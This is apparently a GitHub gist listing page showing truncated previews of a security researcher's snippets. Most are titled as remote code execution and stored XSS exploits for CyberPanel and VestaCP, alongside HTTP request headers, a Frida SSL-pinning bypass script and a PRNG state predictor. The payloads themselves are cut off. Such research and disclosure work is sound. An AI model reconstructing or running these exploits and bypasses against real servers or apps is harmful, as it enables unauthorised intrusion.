POST /add/ip/ HTTP/1.1
Host: 89.252.140.31:8083
Connection: close
Content-Length: 165
Cache-Control: max-age=0
Origin: https://89.252.140.31:8083
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
numanturle
/ cyberpanel.py
Created
August 27, 2021 03:38
CyberPanel - Remote Code Execution (Authenticated) ( Version 2.1 )
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # -*- coding: utf-8 -*- | |
| # CyberPanel - Remote Code Execution (Authenticated) ( Version 2.1 ) | |
| # author: twitter.com/numanturle | |
| # usage: cyberpanel.py [-h] -u HOST -l LOGIN -p PASSWORD [-f FILE] | |
| # cyberpanel.py: error: the following arguments are required: -u/--host, -l/--login, -p/--password | |
| import argparse,requests,warnings,json,re,base64,websocket,ssl,_thread,time | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import json | |
| import sys | |
| from time import sleep | |
| from datetime import datetime | |
| from elasticsearch import Elasticsearch, helpers | |
| es = Elasticsearch("localhost:9200") | |
| def create_index(index): | |
| es.indices.create(index=index, ignore=400) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import struct | |
| from decimal import * | |
| import os | |
| from z3 import * | |
| MAX_UNUSED_THREADS = 2 | |
| # Calculates xs128p (XorShift128Plus) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import time | |
| import frida | |
| import json | |
| enc_cipher_hashcodes = [] #cipher objects with Cipher.ENCRYPT_MODE will be stored here | |
| dec_cipher_hashcodes = [] #cipher objects with Cipher.ENCRYPT_MODE will be stored here | |
| def my_message_handler(message, payload): | |
| #mainly printing the data sent from the js code, and managing the cipher objects according to their operation mode | |
| if message["type"] == "send": |
numanturle
/ VestaCP_Stored_Xss.md
Created
March 7, 2021 23:23
numanturle
/ CyberPanel - Authenticated Remote Code Execution - 3.md
Created
March 7, 2021 17:47
POST /filemanager/controller HTTP/1.1
Host: HOST:8090
Connection: close
Content-Length: 175
Accept: application/json, text/plain, */*
DNT: 1
X-CSRFToken: MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=UTF-8
numanturle
/ CyberPanel - Authenticated Remote Code Execution - 2.md
Last active
January 9, 2023 21:19
POST /filemanager/controller HTTP/1.1
Host: HOST:8090
Connection: close
Content-Length: 141
Accept: application/json, text/plain, */*
DNT: 1
X-CSRFToken: MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=UTF-8
numanturle
/ CyberPanel - Authenticated Remote Code Execution - 1.md
Created
March 7, 2021 16:56
CyberPanel - Authenticated Remote Code Execution - 1
HTTP REQUEST
POST /websites/addNewCron HTTP/1.1
Host: HOST:8090
Connection: close
Content-Length: 137
Accept: application/json, text/plain, */*
DNT: 1
X-CSRFToken: MnbiTTzojyQye27IpaGyqfhsocdfYbtW3zVL3eI7gZk7dGmuxEYApZM2Pp59eJQZ
User-Agent: Mozilla/5.0
numanturle
/ frida_multiple_unpinning.js
Created
January 10, 2021 00:46
— forked from akabe1/frida_multiple_unpinning.js
Another Android ssl certificate pinning bypass for various methods
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* Android ssl certificate pinning bypass script for various methods | |
| by Maurizio Siddu | |
| Run with: | |
| frida -U -f [APP_ID] -l frida_multiple_unpinning.js --no-pause | |
| */ | |
| setTimeout(function() { | |
| Java.perform(function () { | |
| console.log(''); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $handle = fopen("big.json", "r"); | |
| if ($handle) { | |
| while (($line = fgets($handle)) !== false) { | |
| // process the line read. | |
| } | |
| fclose($handle); | |
| } else { | |
| // error opening the file. | |
| } |